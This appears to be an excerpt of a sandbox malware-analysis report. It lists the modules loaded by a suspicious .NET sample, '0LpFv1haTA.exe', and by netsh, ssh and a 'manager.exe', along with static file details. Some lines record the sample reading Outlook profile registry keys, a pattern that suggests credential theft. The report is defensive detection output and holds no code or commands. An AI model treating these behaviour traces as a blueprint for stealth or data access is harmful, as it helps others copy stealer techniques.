Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: httpapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: avicap32.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: libcrypto.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: libcrypto.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: httpapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\manager.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\manager.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\manager.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\manager.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\manager.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\manager.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\manager.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\manager.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\manager.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\manager.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\manager.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\manager.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\0LpFv1haTA.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: 0LpFv1haTA.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 0LpFv1haTA.exe Static file information: File size 9593944 > 1048576
Source: 0LpFv1haTA.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Xml.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.ni.pdbRSDS source: WER895A.tmp.dmp.36.dr
